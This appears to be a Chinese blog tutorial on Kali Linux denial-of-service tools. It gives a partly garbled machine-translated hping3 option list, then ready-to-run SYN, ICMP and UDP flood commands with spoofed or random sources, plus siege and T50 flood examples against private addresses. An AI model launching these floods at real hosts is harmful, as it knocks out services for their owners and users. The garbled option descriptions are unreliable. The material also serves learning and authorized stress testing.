kali linux之拒绝服务攻击工具
hping3
几乎可以定制发送任何TCP/IP数据包,用于测试FW,端口扫描,性能测试
-c - 计数包计数
-i - interval wait(uX表示X微秒,例如-i u1000)
- -i u10000的快速别名(第二个10个数据包)
- -i u1000的快速别名(第二个100个数据包)
--flood尽可能快地发送数据包。不要显示回复。
-n - 数字数字输出
-q - 安静
-I - 接口接口名称(否则为默认路由接口)
-V - verbose verbose模式
-D - 调试调试信息
-z - 绑定ctrl + z到ttl(默认为dst端口)
-Z - unbind unbind ctrl + z - 为收到的每个匹配数据包发出蜂鸣声
模式
默认模式TCP
-0 - RAIP RAW IP模式
-1 - icmp ICMP模式
-2 - 表示UDP模式
-8 - 扫描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host
-9 - 听听模式
IP
-a - 欺骗欺骗源地址
--rand-dest随机destionation地址模式。看到那个男人。
--rand-source随机源地址模式。看到那个男人。
-t --ttl ttl(默认64)
-N - id id(默认随机)
-W --winid使用win * id字节排序
-r --rel相对化id字段(估计主机流量)
-f --frag分割更多碎片的数据包。 (可以通过弱acl)
-x --morefrag设置更多片段标志
-y --dontfrag set不分片标志
-g --fragoff设置片段偏移量
-m --mtu设置虚拟mtu,暗示--frag如果数据包大小> mtu
-o --tos服务类型(默认为0x00),尝试--tos帮助
-G --rroute包含RECORD_ROUTE选项并显示路由缓冲区
--lsrr松散的源路由和记录路由
--ssrr严格的源路由和记录路由
-H --ipproto仅在RAW IP模式下设置IP协议字段
ICMP
-C --icmptype icmp type(默认回显请求)
-K - icmpcode icmp code(默认为0)
--force-icmp发送所有icmp类型(默认发送仅支持的类型)
--icmp-gw设置ICMP重定向的网关地址(默认为0.0.0.0)
--icmp-ts别名为--icmp --icmptype 13(ICMP时间戳)
--icmp-addr别名为--icmp --icmptype 17(ICMP地址子网掩码)
--icmp-help显示其他icmp选项的帮助
UDP / TCP
-s --baseport基本源端口(默认随机)
-P --destport [+] [+] <port>目标端口(默认为0)ctrl + z inc / dec
-k - 保持静止源端口
-w --win winsize(默认64)
-O --tcpoff设置假tcp数据偏移量(而不是tcphdrlen / 4)
-Q --seqnum仅显示tcp序列号
-b --badcksum(尝试)发送具有错误IP校验和的数据包
许多系统将修复发送数据包的IP校验和
所以你会得到错误的UDP / TCP校验和。
-M --setseq设置TCP序列号
-L --setack设置TCP确认
-F --fin设置FIN标志
-S --syn设置SYN标志
-R - 首先设置RST标志
-P --push设置PUSH标志
-A --ack设置ACK标志
-U - 设置URG标志
-X --xmas设置X未使用标志(0x40)
-Y --ymas设置Y未使用标志(0x80)
--tcpexitcode使用最后的tcp-> th_flags作为退出代码
--tcp-mss启用具有给定值的TCP MSS选项
--tcp-timestamp启用TCP时间戳选项以猜测HZ /正常运行时间
同项
-d - 数据数据大小(默认为0)
-E - 文件中的文件数据
-e --sign添加'签名'
-j --dump以十六进制转储数据包
-J --print转储可打印字符
-B --safe启用“安全”协议
-u --end告诉你--file何时达到EOF并防止倒带
-T --traceroute traceroute mode(暗示--bind和--ttl 1)
--tr-stop在traceroute模式下收到第一个非ICMP时退出
--tr-keep-ttl保持源TTL固定,仅用于监视一跳
--tr-no-rtt不要在traceroute模式下计算/显示RTT信息,ARS包描述(新的,不稳定的)
--apd-send发送APD描述的数据包
syn flood攻击
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12
hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12
hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12
icmp flood攻击
hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10
udp flood攻击
hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10
Siege:http/https压力测试工具,模拟多个用户并发访问请求
siege -g http://192.168.1.12/xxsec.php / 192.168.1.12
T50
t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
友情链接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn
kali linux之拒绝服务攻击工具的更多相关文章
- DHCP拒绝服务攻击工具DHCPig
DHCP拒绝服务攻击工具DHCPig DHCP服务负责网络的IP分配服务.通过攻击该服务,可以导致网络内主机获取不到IP,而无法正常使用网络.Kali Linux提供一款专用工具DHCPig.该工 ...
- Kali linux渗透测试常用工具汇总1
1.ProxyChains 简介:代理工具.支持HTTP/SOCKS4/SOCK5的代理服务器,允许TCP/DNS通过代理隧道. 应用场景:通过代理服务器上网. 配置:/etc/proxychains ...
- Kali Linux菜单中各工具功能大全
各工具kali官方简介(竖排):https://tools.kali.org/tools-listing 名称 类型 使用模式 功能 功能评价 dmitry 信息收集 whois查询/子域名收集/ ...
- 使用Kali Linux执行中间人攻击(演示)
中间人攻击也叫Man-In-The-Middle-Attack. 我假设你已经知道中间人攻击的基本概念,引用一段wikipedia: 中间人攻击(Man-in-the-middle attack,缩写 ...
- kali linux maltego-情报收集工具
Maltego是一个交互式数据挖掘工具,它为链接分析呈现有向图.该工具用于在线调查,以发现互联网上各种来源的信息片段之间的关系. 注册Maltego账号,注册地址:https://www.paterv ...
- kali linux之拒绝服务
Dos不是DOS(利用程序漏洞或一对一资源耗尽的denial of service拒绝服务) DDoS分布式拒绝服务(多对一的攻击汇聚资源能力,重点在于量大,属于资源耗尽型) 历史 以前:欠缺技术能力 ...
- Kali linux渗透测试常用工具汇总2-渗透攻击
渗透攻击的思路一般是扫描漏洞,然后利用不同的漏洞,才有针对的渗透攻击. 漏洞扫描的工具有Nessus,该工具可同时在本地或远端遥控,对系统的漏洞分析扫描.Nessus通过新建扫描策略,并添加对应的插件 ...
- Kali Linux之常见后门工具介绍
1.Meterpreter 它是Metasploit框架中功能强大的后渗透模块.可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端. 命令 作用 ...
- Kali Linux下运行nfc工具测试!
由于Kali本身就集成了很多nfc工具,用起来很方便,再加上一个acr122u读卡器,来尝试PJ学校水卡! 首先安装驱动,到龙杰官网下载Linux的,解压后进入自己Linux发行版,Kali的是Deb ...
随机推荐
- 依赖VUE组件通讯机制实现场景游戏切换
- c# ?和??
先看如下代码: string strParam = Request.Params["param"]; if ( strParam== null ) { strParam= ...
- Python Windows下打包成exe文件
Python Windows 下打包成exe文件,使用PyInstaller 软件环境: 1.OS:Win10 64 位 2.Python 3.7 3.安装PyInstaller 先检查是否已安装Py ...
- SLAM Course - WS13/14 by Cyrill Stachniss (1) 课程资源汇总
本帖是作者学习SLAM 课程笔记的资源帖,汇总了SLAM Course - WS13/14 by Cyrill Stachniss 的相关资源. 1. 课程网站,有相关课件作业和教学视频下载. htt ...
- ChainOfResponsibilityPattern(23种设计模式之一)
参考书籍:设计模式-可复用面向对象软件基础(黑皮书) 目的:使多个对象都有机会处理请求,从而避免请求的发送者和接受者之间的耦合关系.将这些对象连成一条链,并沿这条链传递该请求,直到有一个对象处理它为止 ...
- [OS] 如何在远程机器上用ctrl+alt+del键修改登录用户的密码
远程登录某台机器,想修改当前登录用户的密码,系统提示按Ctrl+Alt+Del,在出现的界面里修改密码 但我一按这三个键,是在我本地客户机生效,而不是在远程服务器. 答案 : 向远程桌面发送Ctrl+ ...
- Hadoop Shell
1.常用的一些Shell 再好的博客,都不如官方文档好用: http://hadoop.apache.org/docs/r1.0.4/cn/hdfs_shell.html
- access函数使用
调用open函数时,是以有效用户而不是实际用户的身份去验证进程对要打开的文件的读写权限.但是有时候我们想知道的是实际用户而非有效用户对某一文件的权限,此时就要用到access函数. 函数原型:in ...
- ZT 基于git的版本管理思路
http://nvie.com/posts/a-successful-git-branching-model/ 分为5种分支: feature:功能分支,开发人员在此种分支下开发新的功能,开发完成后m ...
- DateTime.Now.ToString("yyyy/MM/dd") 时间格式化中的MM为什么是大写的?
如果MM是小写,就表示时间里的分钟yyyy-MM-dd HH:mm:ss (年-月-日 时:分:秒) yyyy-MM-dd HH:mm:ss 年-月-日 时:分:秒大写是为了区分“月”与“分” 顺便说 ...